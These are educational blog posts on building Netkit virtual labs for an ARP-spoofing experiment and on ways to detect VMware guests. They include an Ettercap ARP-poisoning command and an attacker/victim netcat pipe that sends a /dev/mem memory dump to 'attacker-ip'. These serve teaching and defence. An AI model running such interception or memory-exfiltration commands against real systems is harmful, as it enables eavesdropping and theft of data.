The last line sets the eth0 interface of the router as tap. That is equivalent to establishing a point-to-point link between the virtual machine Router (192.168.10.2) and our real PC (192.168.10.1), through which the Router can reach the Internet using our PC as a gateway. In fact, when we start the lab, if we do an ifconfig on our PC we will see that an interface called nk_tap_root with IP 192.168.10.1 has been created. As far as the default route is concerned, Netkit puts a static route on Router pointing to 192.168.10.1. This lets Router reach the Internet normally, but if we also want to let the rest of the virtual network PCs reach the Internet (using Router and the real PC as gateways) we have to add a route on our real PC towards the virtual network:

dante@Hades:~$ sudo route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.10.2

Now, inside the lab folder, we are going to create a subdirectory for each virtual machine to be used.
dante@Hades:~/netkit_labs$ mkdir lab_sniffing_sw
dante@Hades:~/netkit_labs$ cd lab_sniffing_sw/
dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir Router
dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir Switch
dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir PC-Alice
dante@Hades:~/netkit_labs/lab_sniffing_sw$ mkdir PC-Sniffer
dante@Hades:~/netkit_labs/lab_sniffing_sw$ ls
PC-Alice  PC-Sniffer  Router
dante@Hades:~/netkit_labs/lab_sniffing_sw$

The subdirectories of the virtual machines can stay empty or be used to deposit files that will appear inside the virtual machine. For example, if we wanted PC-Alice to have a script in /usr/bin, we would create the folder "/netkit_labs/lab_sniffing_sw/PC-Alice/usr/bin" and leave a copy of the script there. In our case, what we will put in each machine's /etc/ are the files needed to configure its network resources properly.

In Alice's case, it will be as follows:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat ./PC-Alice/etc/network/interfaces
auto lo eth0
iface lo inet loopback
    address 127.0.0.1
    netmask 255.0.0.0
iface eth0 inet static
    address 192.168.0.2
    netmask 255.255.255.0
    gateway 192.168.0.1

The PC-Sniffer will have the following network configuration:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat ./PC-Sniffer/etc/network/interfaces
auto lo eth0
iface lo inet loopback
    address 127.0.0.1
    netmask 255.0.0.0
iface eth0 inet static
    address 192.168.0.3
    netmask 255.255.255.0
    gateway 192.168.0.1
The router will have the following network configuration:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat ./Router/etc/network/interfaces
auto lo eth1
iface lo inet loopback
    address 127.0.0.1
    netmask 255.0.0.0
iface eth1 inet static
    address 192.168.0.1
    netmask 255.255.255.0

Also, if we want our virtual machines to perform DNS resolution (essential if we install packages with apt or browse using lynx), we have to include an /etc/resolv.conf file on each of the virtual machines, as we did with /etc/network/interfaces. A copy of the contents of our real PC's /etc/resolv.conf will be enough.

The final step is to configure the switch and decide which services are to be started on each virtual machine. For that, Netkit lets us define which commands are run during the startup and shutdown of the virtual machines using startup and shutdown scripts, respectively. For our lab we will create the following scripts:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat Switch.startup
ifconfig eth0 up
ifconfig eth1 up
ifconfig eth2 up
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
brctl addif br0 eth2
brctl stp br0 on
ifconfig br0 up

This script configures a bridge when the Switch machine boots, adding ports eth0, eth1 and eth2 to the bridge and activating spanning-tree (unnecessary in this case because there is only one switch, but it is a good habit to keep).

The startup commands of the rest of the machines are easier, because all they do is start the network service:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat Router.startup
/etc/init.d/networking start
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat PC-Alice.startup
/etc/init.d/networking start
dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat PC-Sniffer.startup
/etc/init.d/networking start

This example is very simple, but thanks to these scripts we can make a laboratory configure itself without the end user having to do anything. In fact, the best approach is to configure the IP addresses of the interfaces and the routes through these scripts instead of copying configuration files into each machine's /etc, but taking that detour gave me the opportunity to explain how to place files in the directory tree of the virtual machines.
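For instance, a PC-Alice.startup that configures the network directly, instead of relying on a copied /etc/network/interfaces, could look something like this (a sketch reusing the addresses defined above):

ifconfig eth0 192.168.0.2 netmask 255.255.255.0 up
route add default gw 192.168.0.1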

Now, finally, it's time to start our laboratory. Laboratories are started with the lstart command and stopped with lhalt. Let's see what happens in our case:
dante@Hades:~/netkit_labs/lab_sniffing_sw$ sudo lstart
[sudo] password for dante:
======================== Starting lab ===========================
Lab directory: /home/dante/netkit_labs/lab_sniffing_sw
Version:       0.1
Author:        Dante
Email:         dante.signal31@gmail.com
Web:           http://danteslab.blogspot.com/
Description:   Laboratorio para simular un ataque de ARP-Spoofing
=================================================================
Starting "PC-Alice" with options "-q --mem=100 --eth0 CD-A --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/home/dante/netkit_labs/lab_sniffing_sw"...
Starting "PC-Sniffer" with options "-q --mem=100 --eth0 CD-C --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/home/dante/netkit_labs/lab_sniffing_sw"...
Starting "Router" with options "-q --mem=100 --eth1 CD-B --eth0 tap,192.168.10.1,192.168.10.2 --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/home/dante/netkit_labs/lab_sniffing_sw"...
Starting "Switch" with options "-q --mem=100 --eth1 CD-A --eth2 CD-C --eth0 CD-B --hostlab=/home/dante/netkit_labs/lab_sniffing_sw --hostwd=/home/dante/netkit_labs/lab_sniffing_sw"...
The lab has been started.
=================================================================
dante@Hades:~/netkit_labs/lab_sniffing_sw$

To check that the resulting network works we can try surfing the Internet with lynx from PC-Alice:


Now that we have checked that our network works, we can put our laboratory to use by performing the experiment mentioned at the beginning of the article: an ARP-Spoofing attack against Alice from PC-Sniffer.

As you can see in the picture above, PC-Sniffer has tcpdump running, but it only sees the spanning tree (STP) traffic issued by the switch. Unlike the previous article's network, in which I simulated a hub, this switch does not replicate traffic on all ports but only on the port that leads to the destination of the data.

To spy on the traffic between Router and PC-Alice we will have to place ourselves between them, making them believe they are talking to each other when they are actually talking to PC-Sniffer.

We will use the Ettercap tool, which is installed by default in the Debian image that Netkit brings (if not, you could install it with a simple "#aptitude install ettercap", as we would on our real PC). Ettercap allows interception on switched networks. It really is a little wonder that deserves an article of its own. Here we will use Ettercap from PC-Sniffer to spy on Alice's web traffic. To launch an ARP-Spoofing attack (also called ARP-Poisoning) with Ettercap, the command would be:

PC-Sniffer# ettercap -M arp:remote -T /192.168.0.1/ /192.168.0.2/

Immediately, the PC-Sniffer screen starts pouring out the contents of the data exchanged between PC-Alice and her gateway, Router, while she browses the Internet:


To stop the lab you just have to do "sudo lhalt" from the root directory of the lab (the same place where we launched lstart). If we want to relaunch the laboratory, we must take into account the need to add back the route to the virtual network, which disappeared when lhalt disabled the tap interface. On the other hand, lstart created .disk files in the lab folder so that the programs installed on the virtual machines, or any other changes made, are not lost. That means the folders where we placed the configuration files are no longer read, so if you want to put new files there you first have to delete the .disk files and run lstart again so Netkit re-reads those folders. Another useful option to transfer files to and from the virtual machines is the /hosthome folder present in all virtual machines, which mounts the home of the user who launched Netkit.

In another article I will explain how Ettercap works, along with other interception techniques. This article has served to demonstrate the utility of Netkit to simulate the complex networks that make computer security experiments possible, with a considerable saving in effort, money and space. It is also an invaluable aid for those who intend to teach the art of computer security, allowing us to offer our readers preconfigured laboratories so the student can focus exclusively on the techniques explained, without having to waste time setting up a test network on their own. That's why my further articles will include links to Netkit laboratories especially designed to practice, in a fast and simple way, what is explained in them.

12 October 2013

Creating virtual laboratories with Netkit (I)

Progress in the field of security engineering requires constant learning in multiple disciplines. This learning is largely theoretical, but to be fully effective it needs to be put into practice. A security engineer should be able to put himself in an attacker's boots and foresee with reasonable certainty what his next step could be. But this is difficult, because an engineer cannot go around attacking networks with the excuse that he is learning how the bad guys work.

Until recently, the only option available for security students was to set up a laboratory at home, collecting low-cost computers and network equipment. Unfortunately this was expensive, consumed the increasingly scarce space of modern homes and set your partner/spouse/father/mother against you, because they didn't understand the utility of all that. Fortunately, the era of virtualization came to the rescue, so today it is possible to assemble complex virtual laboratories inside our computer.

The easiest option is VMware or VirtualBox, which are ideal for testing tools, rootkits, vulnerabilities, etc. on different operating systems without endangering our own computer. Starting several of these virtual machines, we can run tests simulating a LAN network. There are even tutorials to simulate more complex topologies using VMware. However, at that point such tools may require an amount of computer resources that we may not have.

The other option is called Netkit, developed at the University of Rome. Its focus is not so much the emulation of specific equipment as of complete networks. Netkit allows us to define a network topology and experiment with it. To do that, we start a series of nodes, which are just light Debian Linux virtual instances, and we configure them according to the role they play within the network we want to simulate (router, switch or end device).

Installation is very simple. First, download three files:


Once downloaded, they must all be unzipped together in the directory of your choice (we assume /usr/share/netkit; see the update at the end of the article) and then a few environment variables must be prepared to record where we installed Netkit. To do this, it is best to add the following lines at the end of /etc/profile:
NETKIT_HOME="/usr/share/netkit"
MANPATH="$MANPATH:$NETKIT_HOME/man"
PATH="$PATH:$NETKIT_HOME/bin"
export NETKIT_HOME MANPATH PATH
Once this is done you have to restart the computer so the environment variables you just configured are loaded. And that's it; to check that nothing fails, run a script that Netkit includes:
dante@Hades:/usr/share/netkit$ ./check_configuration.sh
> Checking path correctness... passed.
> Checking environment... passed.
> Checking for availability of man pages... passed.
> Checking for proper directories in the PATH... passed.
> Checking for availability of auxiliary tools:
awk : ok
basename : ok
date : ok
dirname : ok
find : ok
getopt : ok
grep : ok
head : ok
id : ok
kill : ok
ls : ok
lsof : ok
ps : ok
readlink : ok
wc : ok
port-helper : ok
tunctl : ok
uml_mconsole : ok
uml_switch : ok
passed.
> Checking for availability of terminal emulator applications:
xterm : found
konsole : found
gnome-terminal : not found
passed.
[ READY ] Congratulations! Your Netkit setup is now complete! Enjoy Netkit!

At this point the really interesting part begins.

Let's start two virtual machines connected to the same collision domain (as if they were connected to the same hub) and ping between them:
dante@Hades:~/netkit_labs$ vstart --eth0=CD-A -M 100 PC-1
dante@Hades:~/netkit_labs$ vstart --eth0=CD-A -M 100 PC-2
dante@Hades:~/netkit_labs$ ls -l
total 1136
-rw-r--r-- 1 dante dante 1074012160 2008-09-11 23:26 PC-1.disk
-rw-r--r-- 1 dante dante        470 2008-09-11 23:25 PC-1.log
-rw-r--r-- 1 dante dante 1074012160 2008-09-11 23:26 PC-2.disk
-rw-r--r-- 1 dante dante        470 2008-09-11 23:26 PC-2.log

With the --eth0 parameter that interface is assigned to the CD-A collision domain (we can name them as we wish), and with -M we give 100 MB of RAM to the machine. You can see that Netkit creates a .disk file for each virtual machine created; that disk is where its file system is kept. Each file system uses 1.1 GB by default, so you'd better make sure you have free disk space before starting an experiment with many machines.

For each vstart, an xterm window appears with the console of the virtual machine that has been launched.


Here is where we are going to configure every machine:
PC-1:~# ifconfig eth0 192.168.0.1 netmask 255.255.255.0 up
PC-2:~# ifconfig eth0 192.168.0.2 netmask 255.255.255.0 up

If we now ping between the two machines, we can see their replies.

Now let's do a simple experiment, so nobody can say this article has not addressed security. Let's go back over 10 years, when networks were based largely on hubs, i.e. when all the PCs on a network were connected to the same collision domain. In those days it was very easy to eavesdrop (sniffing), as hubs replicated everything received on one port to all the other ports, so anyone who put their interface in promiscuous mode could keep their network card from dropping packets not addressed to it and display them in a program like tcpdump. To simulate what an attacker would have done in those days, we are going to create a PC in the same way as above, but calling it PC-3 and assigning it the IP address 192.168.0.3. This would be like connecting the attacker's PC to the hub of the spied victims. Now we start tcpdump on PC-3 and see if we can capture the pings we launch from PC-2 to PC-1:


As you can see in the picture, we gave PC-2 time to send two pings to PC-1, which answered correctly. And what has PC-3 seen? The answer is everything: the ARP request of PC-2, the response of PC-1, the ICMP request of PC-2 (pings going out) and the ICMP reply of PC-1 (pings coming back). In fact, PC-3 has heard the whole "conversation" between PC-2 and PC-1. If this had not been a mere ping but a telnet session, PC-3 might have captured the username and password passed from PC-2 to PC-1. Hence the importance of encrypting terminal sessions with SSH.

To shut down the virtual machines, you can run halt from within each of them or use vhalt from our real command line:
dante@Hades:~/netkit_labs$ vhalt PC-1
Halting virtual machine "PC-1" (PID 29271) owned by dante [.... ]
dante@Hades:~/netkit_labs$ vhalt PC-2
Halting virtual machine "PC-2" (PID 30824) owned by dante [.... ]
dante@Hades:~/netkit_labs$ vhalt PC-3
Halting virtual machine "PC-3" (PID 28568) owned by dante [.... ]
dante@Hades:~/netkit_labs$

If you would like to restart the machines, you only need to use the vstart command again (provided you have not deleted the .disk file). For example, to boot PC-1 we would do: vstart PC-1

Well, not bad for a start: we have assembled an experiment with three PCs and a hub without owning any of those four things... You couldn't ask for more, could you? In my next article (or articles) I'm going to delve into Netkit's possibilities to develop more complex and interesting experiments.

Update 2010-01-01: In its new version, Netkit has changed the file system (the Debian image that is loaded by each of the virtual machines) to a 10 GB filesystem. Fortunately, if we use partitions with serious filesystems (ext, ReiserFS, XFS, JFS and NTFS) there is nothing to worry about, because it will be treated as a sparse file and will not take even a fraction of that size. The only thing you have to do is extract all the files downloaded from the Netkit website into /usr/share/netkit using the command sudo tar -xjSf, the S being precisely to treat the extracted files as sparse ones.

13 November 2011

Virtual Machine Detection

Virtualization has expanded strongly over recent years in the design of organizational systems, which is not surprising given the cost savings it offers, its ease of scaling and its fault tolerance. So much so that some are now beginning to say it is better for the backoffice to be based exclusively on virtualization solutions like those offered by VMware, Xen or VirtualBox, among others. However, these proposals tend to be based more on excitement about marketing promises than on cold technical analysis.

A middle point is probably the most interesting and safe: keep using physical machines for critical services and bring virtualization into play when a physical machine fails, or as temporary support in case of load saturation of a physical farm. Another very interesting field for virtual machines is the test lab during development work, or creating decoy machines and honeypots. In any case, in my humble opinion, combining in one physical machine virtualized servers from different security levels is completely inadvisable, given that vulnerabilities are being discovered that bring into question the alleged isolation between the host machine and its virtual machines. In the event that such isolation is compromised, an attacker might try to jump from one level to another, avoiding the perimeter defenses, or could compromise the other machines hosted on the same virtualization platform.

Given these vulnerabilities, it is becoming normal to see techniques to discover whether a machine is part of a virtualization infrastructure or not. For an intruder who discovers he is inside a virtual machine, it can be much more profitable to attack the physical host machine than to use the virtual machine as a bridge to the rest of the network. These techniques analyze the target machine in order to detect signs typical of a virtual machine. Such signs may be of different types:


    • Telltale processes, file systems and/or registry entries.
    • Telltale signs in memory.
    • Virtual hardware.
    • Low-level instructions specific to virtual machines.

Throughout this article we will study each of these possible leads using the example of a VMware-based virtual machine, as it is the most widespread and, to some extent, typical platform.

In the case of VMware, the most easily detectable process is VMtools. VMtools is a pack of VMware's own tools that, if installed in a virtual machine, increases graphics performance and establishes a communication channel between the host and the virtual machine so that you can use shared folders or drag-and-drop files. The problem is that all these features have a price: they pose a risk to the safety of the system by driving a wedge into the isolation between the host and the virtual machine. The fact is that the use of VMtools activates a service that is easily detectable in the virtual machine's process table. Besides, a thorough analysis of the file system of a virtual machine turns up more than 50 references to the words "vmware" and "vmx". The same can be said of the registry (in the case of Windows), which will be "marked" with over 300 references to the word VMware. For all the above, VMtools should be avoided when possible, using them only after a proper risk analysis.
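A couple of quick shell checks illustrate the idea (these exact commands are my own illustration, not taken from any specific tool):

victim$ ps aux | grep -i vmtools
victim$ find / -iname "*vmware*" 2>/dev/null | wc -l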

The second case, the memory footprint, is virtually impossible to avoid. If the virtual machine runs Linux, an attacker could dump its main memory and analyze it later in search of the word "vmware". To do so, the attacker would need nothing more than the following:
attacker$ nc -l -p 2000 -o memory_dump_genesys 
victim$ sudo dd if=/dev/mem bs=100k | nc attacker-ip 2000
Once downloaded, analyzing the dump can be as simple as the following:
attacker$ grep -ic vmware memory_dump_genesys
360
attacker$ grep -i vmware memory_dump_genesys 
<> 

The problem with this approach is its slowness, since the attacker has to transmit the memory image (several GB) over the network, and the load it places on the attacked machine, which could alert administrators to the intrusion.
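If the attacker already has root on the guest, a quicker local variant is conceivable (purely a sketch: it avoids the network transfer but still loads the machine, and modern kernels often restrict direct reads of /dev/mem):

# Hypothetical local check: count "vmware" strings in physical memory
# without shipping a multi-GB dump over the network.
sudo grep -aci vmware /dev/mem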
Another option is to use specialized tools such as Scoopy, which can detect memory allocation patterns typical of virtualized machines.

As for the virtual hardware, the easiest item to detect is the network card, since the first 6 hexadecimal characters of the MAC address identify the card manufacturer. On the Internet there are many lookup services that identify the Ethernet card vendor from its MAC. In the case of VMware, virtual Ethernet interfaces are marked with a MAC address of the form 00:0C:29:xx:xx:xx.
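A quick check along these lines could look like this (a sketch: 00:0C:29, 00:50:56 and 00:05:69 are MAC prefixes registered to VMware, and I assume a Linux guest with the ip utility available):

# Flag any interface whose MAC prefix belongs to VMware's registered ranges
ip link | awk '/link\/ether/ {print $2}' \
  | grep -iE '^(00:0c:29|00:50:56|00:05:69)' \
  && echo "VMware-style MAC detected"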
Another case is that of hard disks, because VMware virtualizes SCSI hard drives. A simple search of the boot logs reveals that we are dealing with a virtual machine:

dante@dante-desktop:~$ cat /var/log/messages | grep scsi
Mar 19 21:17:57 dante-desktop kernel: [83993.729650] scsi0: ata_piix
Mar 19 21:17:57 dante-desktop kernel: [83993.729955] scsi1: ata_piix
Mar 19 21:17:57 dante-desktop kernel: [83994.585470] scsi 1:0:0:0: CD-ROM PIONEER DVD-RW DVR-111D 1.23 PQ: 0 ANSI: 5
Mar 19 21:17:57 dante-desktop kernel: [83994.585847] scsi 1:0:1:0: CD-ROM IDE CDR11 VMware NECVMWar 1.00 PQ: 0 ANSI: 5
Mar 19 21:17:57 dante-desktop kernel: [83994.631853] sr0: scsi3-mmc drive: 40x/40x writer cd / rw cdda tray xa/form2
Mar 19 21:17:57 dante-desktop kernel: [83994.634815] sr1: scsi3-mmc drive: 1x/1x cdda tray xa/form2
Mar 19 21:17:57 dante-desktop kernel: [83994.648546] sr 1:0:0:0: Attached scsi generic sg0 type 5
Mar 19 21:17:57 dante-desktop kernel: [83994.648772] sr 1:0:1:0: Attached scsi generic sg1 type 5
Mar 19 21:17:57 dante-desktop kernel: [83994.931779] SCSI2: ioc0: LSI53C1030, FwRev = 01032920h, Ports = 1, MaxQ = 128, IRQ = 17
Mar 19 21:17:57 dante-desktop kernel: [83995.050997] scsi 2:0:0:0: Direct-Access VMware, VMware Virtual S 1.0 PQ: 0 ANSI: 2
Mar 19 21:17:57 dante-desktop kernel: [83995.063046] scsi 2:0:0:0: Attached scsi generic sg2 type 0
Mar 22 20:11:50 dante-desktop kernel: [88289.831746] scsi0: ata_piix
Mar 22 20:11:50 dante-desktop kernel: [88289.835558] scsi1: ata_piix
Mar 22 20:11:50 dante-desktop kernel: [88291.093663] scsi 1:0:0:0: CD-ROM PIONEER DVD-RW DVR-111D 1.23 PQ: 0 ANSI: 5
Mar 22 20:11:50 dante-desktop kernel: [88291.101227] scsi 1:0:1:0: CD-ROM IDE CDR11 VMware NECVMWar 1.00 PQ: 0 ANSI: 5
Mar 22 20:11:50 dante-desktop kernel: [88291.380171] SCSI2: ioc0: LSI53C1030, FwRev = 01032920h, Ports = 1, MaxQ = 128, IRQ = 16
Mar 22 20:11:50 dante-desktop kernel: [88291.504844] scsi 2:0:0:0: Direct-Access VMware, VMware Virtual S 1.0 PQ: 0 ANSI: 2
Mar 22 20:11:50 dante-desktop kernel: [88296.060604] sr0: scsi3-mmc drive: 40x/40x writer cd / rw cdda tray xa/form2
Mar 22 20:11:50 dante-desktop kernel: [88296.076810] sr1: scsi3-mmc drive: 1x/1x cdda tray xa/form2
Mar 22 20:11:50 dante-desktop kernel: [88296.159975] sr 1:0:0:0: Attached scsi generic sg0 type 5
Mar 22 20:11:50 dante-desktop kernel: [88296.160101] sr 1:0:1:0: Attached scsi generic sg1 type 5
Mar 22 20:11:50 dante-desktop kernel: [88296.160215] scsi 2:0:0:0: Attached scsi generic sg2 type 0

As if this were not clear enough, a simple call to the sdparm command confirms the point:

dante@dante-desktop:~$ sudo sdparm -a /dev/sda1
/dev/sda1: VMware, VMware Virtual S 1.0

In the end, we have shown that virtualization with VMware is not "anonymous". But there is still one last firework as far as virtual hardware identification is concerned: if we ask the system to identify its hardware drivers, the result is quite illuminating:

dante@dante-desktop:~$ lspci -v
00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 01)
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 0

00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 01) (prog-if 00 [Normal decode])
Flags: bus master, 66MHz, medium devsel, latency 0
Bus: primary = 00, secondary = 01, subordinate = 01, sec-latency = 64

00:07.0 ISA bridge: Intel Corporation PIIX4 ISA 82371AB/EB/MB (rev 08)
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 0

00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01) (prog-if 8a [Master SecP PriP])
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 64
[Virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size = 8]
[Virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size = 1]
[Virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size = 8]
[Virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size = 1]
I/O ports at 1050 [size = 16]

00:07.2 USB Controller: Intel Corporation 82371AB/EB/MB PIIX4 USB (prog-if 00 [UHCI])
Subsystem: VMware Inc virtualHW v3
Flags: bus master, medium devsel, latency 64, IRQ 18
I/O ports at 1060 [size = 32]

00:07.3 Bridge: Intel Corporation PIIX4 ACPI 82371AB/EB/MB (rev 08)
Subsystem: VMware Inc virtualHW v3
Flags: medium devsel, IRQ 9

00:0f.0 VGA compatible controller: VMware Inc [VMware SVGA II] PCI Display Adapter (prog-if 00 [VGA])
Subsystem: VMware Inc [VMware SVGA II] PCI Display Adapter
Flags: bus master, medium devsel, latency 64
I/O ports at 1440 [size = 16]
Memory at F0000000 (32-bit, non-prefetchable) [size = 128M]
Memory at e8000000 (32-bit, non-prefetchable) [size = 8M]
[Virtual] Expansion ROM at 20010000 [disabled] [size = 32K]

00:10.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 01)
Flags: bus master, medium devsel, latency 64, IRQ 16
I/O ports at 1080 [size = 128]
Memory at e8810000 (32-bit, non-prefetchable) [size = 4K]
[Virtual] Expansion ROM at 20018000 [disabled] [size = 16K]

00:11.0 Ethernet controller: Intel Corporation Gigabit Ethernet Controller 82545EM (Copper) (rev 01)
Subsystem: VMware Inc Unknown device 0750
Flags: bus master, 66MHz, medium devsel, latency 0, IRQ 17
Memory at e8820000 (64-bit, non-prefetchable) [size = 128K]
Memory at e8800000 (64-bit, non-prefetchable) [size = 64K]
I/O ports at 1450 [size = 8]
[Virtual] Expansion ROM at 20000000 [disabled] [size = 64K]
Capabilities: 

00:12.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 02)
Subsystem: Ensoniq Creative Sound Blaster AudioPCI64V, AudioPCI128
Flags: bus master? devsel, latency 64, IRQ 18
I/O ports at 1400 [size = 64]


Scoopy's creator, Tobias Klein, also developed a tool called Doo, able to detect virtual machines based on analyses similar to the ones described in this article.

Finally, we have to mention the low-level instructions specific to virtual machines. Virtualization solutions introduce these instructions to facilitate communication between the VM and the host. Tools like VMDetect use them to detect whether a machine is actually virtualized: they call one of these instructions and, if an exception is raised, we are on a physical machine; if instead the instruction executes normally, we are on a virtual one.
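A related, higher-level check that needs no assembly at all (this is not VMDetect itself, just an approximation: the CPUID instruction sets a hypervisor-present bit when running under a VMM, and Linux exposes it as a CPU flag):

# The "hypervisor" flag in /proc/cpuinfo reflects the CPUID hypervisor bit
grep -qw hypervisor /proc/cpuinfo \
  && echo "hypervisor bit set: almost certainly a virtual machine" \
  || echo "no hypervisor bit: probably physical (or a hypervisor hiding itself)"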

All these detection vectors should make us wary of the alleged infallibility of virtualization that commercial channels try to sell. It is true that virtualization can bring significant benefits to organizations, but only if it is deployed properly and prudently; otherwise it may lead, as with all human works, to disaster.